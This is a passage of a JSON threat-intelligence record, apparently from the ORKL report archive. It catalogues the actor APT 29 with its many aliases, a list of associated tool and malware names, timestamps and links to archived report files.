"PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434048, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.pdf", "text": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.txt", "img": "https://archive.orkl.eu/6fb2dc9b04e89e68f35b966ff99a69b682a3a9c2.jpg" } }